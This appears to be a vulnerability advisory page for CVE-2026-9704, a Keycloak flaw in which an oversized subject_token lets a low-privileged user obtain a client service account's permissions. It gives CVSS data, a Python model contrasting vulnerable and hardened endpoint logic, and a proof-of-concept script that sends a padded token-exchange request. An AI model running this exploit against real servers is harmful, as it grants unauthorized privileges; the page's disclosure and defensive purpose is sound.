Security Vulnerability Report
CVE-2026-9704 CVSS 6.8 MEDIUM

CVE-2026-9704

Published: 2026-05-27 14:17:40
Last Modified: 2026-05-27 14:54:20

Description

A flaw was found in Keycloak. An authenticated user with low privileges can exploit this vulnerability by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. When the token exceeds a 4000-character limit, it is silently dropped, causing the system to fall back to client credentials. This allows the user to gain the permissions of the client's service account, leading to privilege escalation.
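To make the failure mode concrete, the following is an added example, not Keycloak's code, that models a token endpoint's grant dispatch in Python. The vulnerable variant silently drops any form parameter longer than an assumed 4000-character limit (mirroring the figure in the description) and then, finding no subject_token, falls through to the client's own identity, so the caller receives a token carrying the service account's permissions. The hardened variant rejects oversized input with invalid_request and refuses a token-exchange request that lacks a subject_token instead of substituting the client. The JWTs are constructed, unsigned stand-ins; signature verification is out of scope, and the service-account name and parameter limit are assumptions.

```python
import base64
import json
from dataclasses import dataclass

TOKEN_EXCHANGE = "urn:ietf:params:oauth:grant-type:token-exchange"
CLIENT_CREDENTIALS = "client_credentials"
MAX_PARAM_LEN = 4000  # assumed limit, mirroring the 4000-character figure in the advisory
SERVICE_ACCOUNT = "service-account-vulnerable-client"  # hypothetical service-account principal


@dataclass
class Decision:
    status: int          # HTTP status the endpoint would return
    principal: str       # whose permissions the issued token would carry ("" on error)
    error: str = ""      # OAuth error description, if any


def make_jwt(sub):
    """Constructed, unsigned JWT stand-in: header.payload.sig with only a 'sub' claim."""
    def b64(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{b64({'alg': 'none'})}.{b64({'sub': sub})}.sig"


def subject_claim(jwt):
    """Read the 'sub' claim from the payload segment (no signature check in this model)."""
    payload = jwt.split(".")[1]
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))["sub"]


def strip_oversized(form, limit=MAX_PARAM_LEN):
    """Vulnerable input handling: any parameter longer than limit vanishes without an error."""
    return {k: v for k, v in form.items() if len(v) <= limit}


def vulnerable_token_endpoint(form):
    params = strip_oversized(form)           # the silent drop
    grant = params.get("grant_type")
    subject = params.get("subject_token")
    if grant == TOKEN_EXCHANGE and subject is not None:
        return Decision(200, f"user:{subject_claim(subject)}")
    # No usable subject token: authenticate the client alone and issue a token
    # for its service account. Reached both for a genuine client_credentials
    # grant and for a token-exchange request whose subject_token was dropped.
    return Decision(200, SERVICE_ACCOUNT)


def hardened_token_endpoint(form):
    oversized = [k for k, v in form.items() if len(v) > MAX_PARAM_LEN]
    if oversized:
        # Fail closed: an out-of-range parameter is a request error, not a missing value.
        return Decision(400, "", f"invalid_request: parameter too long: {oversized[0]}")
    grant = form.get("grant_type")
    if grant == TOKEN_EXCHANGE:
        if "subject_token" not in form:
            return Decision(400, "", "invalid_request: subject_token is required")
        return Decision(200, f"user:{subject_claim(form['subject_token'])}")
    if grant == CLIENT_CREDENTIALS:
        # Only an explicit client_credentials grant may yield the service account.
        return Decision(200, SERVICE_ACCOUNT)
    return Decision(400, "", "unsupported_grant_type")


def exchange_request(subject_token):
    """Constructed token-exchange form as a low-privileged user would send it."""
    return {
        "grant_type": TOKEN_EXCHANGE,
        "client_id": "vulnerable-client",
        "subject_token": subject_token,
        "requested_token_type": "urn:ietf:params:oauth:token-type:refresh_token",
    }


if __name__ == "__main__":
    alice = make_jwt("alice")
    padded = alice + "A" * (MAX_PARAM_LEN + 1)   # pushes the token past the limit
    for label, form in (("normal", exchange_request(alice)), ("oversized", exchange_request(padded))):
        print(label, "vulnerable ->", vulnerable_token_endpoint(form))
        print(label, "hardened   ->", hardened_token_endpoint(form))
```

The point of the model is the branch, not the length check itself: a size limit is a reasonable defence, but treating an over-limit value as "absent" lets the caller choose which grant path runs. Any fallback from a user-bound flow to a client-bound one must be unreachable from user-controlled input.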

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak (see the vendor advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_keycloak_privilege_escalation(target_url, client_id, valid_user_token):
    """
    PoC for CVE-2026-9704.

    Exploits the logic flaw where an oversized subject_token causes the token
    endpoint to drop the token and fall back to client credentials.
    """
    token_endpoint = f"{target_url}/realms/master/protocol/openid-connect/token"

    # Create an oversized subject_token (> 4000 characters).
    # In a real scenario, this might be a valid JWT header padded with junk.
    # ljust pads to 4001 characters even if the supplied token is already long.
    oversized_token = valid_user_token.ljust(4001, "A")

    # Confidential clients also need client authentication (e.g. client_secret);
    # this PoC sends only the public client_id.
    payload = {
        "grant_type": "urn:ietf:params:oauth:grant-type:token-exchange",
        "client_id": client_id,
        "subject_token": oversized_token,
        "requested_token_type": "urn:ietf:params:oauth:token-type:refresh_token",
    }

    try:
        response = requests.post(token_endpoint, data=payload, timeout=10)
        if response.status_code == 200:
            print("[+] Exploit successful! Token received:")
            print(response.json())
        else:
            print("[-] Exploit failed or patched.")
            print(response.text)
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    # Replace with actual target details
    TARGET = "https://localhost:8080"
    CLIENT_ID = "vulnerable-client"
    USER_TOKEN = "valid.low.priv.token"
    exploit_keycloak_privilege_escalation(TARGET, CLIENT_ID, USER_TOKEN)
```

References

https://access.redhat.com/security/cve/CVE-2026-9704
https://bugzilla.redhat.com/show_bug.cgi?id=2481877

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-9704",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-27T14:17:40.480",
    "lastModified": "2026-05-27T14:54:20.160",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in Keycloak. An authenticated user with low privileges can exploit this vulnerability by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. When the token exceeds a 4000-character limit, it is silently dropped, causing the system to fall back to client credentials. This allows the user to gain the permissions of the client's service account, leading to privilege escalation."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-1284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://access.redhat.com/security/cve/CVE-2026-9704",
        "source": "[email protected]"
      },
      {
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481877",
        "source": "[email protected]"
      }
    ]
  }
}
```